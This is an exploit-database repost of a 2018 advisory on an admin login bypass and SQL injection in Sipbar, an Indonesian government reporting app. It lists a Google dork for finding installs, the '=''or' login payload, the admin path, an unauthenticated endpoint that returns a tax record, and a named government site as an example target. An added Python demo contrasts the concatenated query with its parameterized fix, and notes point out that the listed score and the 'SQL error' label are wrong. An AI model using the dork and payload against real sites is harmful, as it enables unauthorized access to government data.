Sipbar Sistem Informasi Pelaporan Indonesia Admin Login Bypass and SQL Injection Vulnerability

CVE: N/A
Category: CWE-592
Price: Unknown
Severity: Critical
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2018-06-21
CVSS vector (as listed): CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
EPSS: 0.02192
EPSS percentile: 0.50148

Note on the vector: it carries a CVSS:4.0 prefix but uses v3.x metric names (S, C, I, A, with no AT, VC/VI/VA or SC/SI/SA), so it is not a valid v4.0 string. Read as v3.1, AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N scores 5.4 (Medium), which does not agree with the "Critical" severity above, and PR:L is hard to reconcile with an unauthenticated login bypass. Treat the listed score as unreliable.

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018060217

Below is a copy:

Sipbar Sistem Informasi Pelaporan Indonesia Admin Login Bypass and SQL Injection Vulnerability
#################################################################################################

# Exploit Title : Sipbar Sistem Informasi Pelaporan Indonesia Admin Login Bypass and SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 21/06/2018
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592  [ Authentication Bypass Issues ]
+ CWE-89  [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dorks : inurl:"/assets/media/logo_kanal/"

# Exploit : Submit the string '=''or' as both the username and the password on the login form.
#           This is a tautology payload: it only works when the login handler concatenates both fields
#           into the WHERE clause and the database coerces the resulting 0 = '' comparison to true, as
#           MySQL does. Engines with strict comparisons (SQLite, PostgreSQL) are not bypassed by this string.

# Admin Control Panel Path : /login

# Site Logo Change Path => /assets/media/logo_kanal/.....
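Added example, not code from the advisory or from Sipbar: the login-query pattern that the '=''or' payload exploits, beside its parameterized replacement, run against a constructed in-memory SQLite table. The table, the sample row, the query shape and all function names are assumptions; the advisory does not show Sipbar's source. SQLite is used so the block runs offline, and because it does not coerce 0 = '' to true the advisory's exact payload is shown failing there, while a plain tautology that works on both engines shows the same class of bypass.

```python
import sqlite3

# Constructed sample credential store for the demo (not from the advisory).
SAMPLE_USERS = [("admin", "correct-horse-battery")]

# Payload quoted in the advisory, submitted as both username and password.
ADVISORY_PAYLOAD = "'=''or'"

# Generic tautology that bypasses concatenated logins on SQLite and MySQL alike.
TAUTOLOGY = "' OR '1'='1"


def make_db():
    """In-memory SQLite database seeded with one constructed admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_login_query(username, password):
    """Vulnerable pattern (hypothetical reconstruction): input spliced into SQL text."""
    return (
        "SELECT COUNT(*) FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )


def login_vulnerable(conn, username, password):
    """Runs the concatenated query; any quote in the input changes the SQL grammar."""
    count = conn.execute(build_login_query(username, password)).fetchone()[0]
    return count > 0


def login_parameterized(conn, username, password):
    """Hardened form: placeholders keep the input as data, never as SQL tokens."""
    count = conn.execute(
        "SELECT COUNT(*) FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()[0]
    return count > 0


def demo():
    conn = make_db()
    # The advisory payload turns the WHERE clause into
    #   WHERE username=''=''or'' AND password=''=''or''
    # MySQL parses each side as ((username='')='') OR '': the inner comparison
    # gives 0, MySQL coerces 0='' to true, so every row matches. SQLite compares
    # the integer 0 and the text '' as different storage classes (not equal), and
    # '' is false under OR, so the same query matches nothing there.
    results = {
        "query_from_advisory_payload": build_login_query(ADVISORY_PAYLOAD, ADVISORY_PAYLOAD),
        "vuln_advisory_payload_on_sqlite": login_vulnerable(conn, ADVISORY_PAYLOAD, ADVISORY_PAYLOAD),
        "vuln_valid_creds": login_vulnerable(conn, "admin", "correct-horse-battery"),
        "vuln_tautology": login_vulnerable(conn, TAUTOLOGY, TAUTOLOGY),
        "param_valid_creds": login_parameterized(conn, "admin", "correct-horse-battery"),
        "param_tautology": login_parameterized(conn, TAUTOLOGY, TAUTOLOGY),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The fix is the parameterized query, not input filtering: the placeholder version accepts the same strings and simply finds no row, so no quoting rule has to anticipate every dialect's coercion behaviour.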

#################################################################################################

# Unauthenticated controller output (labelled "SQL Injection Error" in the original) =>

# /penyebaran/tracking_sppt/getNop/

A PHP Error was encountered
Severity: Warning

Message: Missing argument 1 for Tracking_sppt::getNop()

Filename: controllers/tracking_sppt.php

Line Number: 19

{"id_sppt":"1077420","thn_pajak":"0","nop":"","nop2":"","kd_kecamatan":null,"kd_kelurahan":null,"nama_wp":null,"kecamatan":null,
"kelurahan":null,"alamat_op":null,"alamat_wp":null,"pbb":null}

# Note : The text above is CodeIgniter's "A PHP Error was encountered" template, triggered because getNop() was
#        requested with no argument. It is a missing-argument warning plus controller path disclosure, not a
#        database error, and no injected payload for this endpoint is given. What it does show is an SPPT
#        (tax assessment) record, keyed by id_sppt, returned as JSON to a request that carried no credentials.

#################################################################################################

# Example Sites : sipbar.tangerangkota.go.id => [ Proof of Concept ] => archive.is/aHKRV - archive.is/1K0DF

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.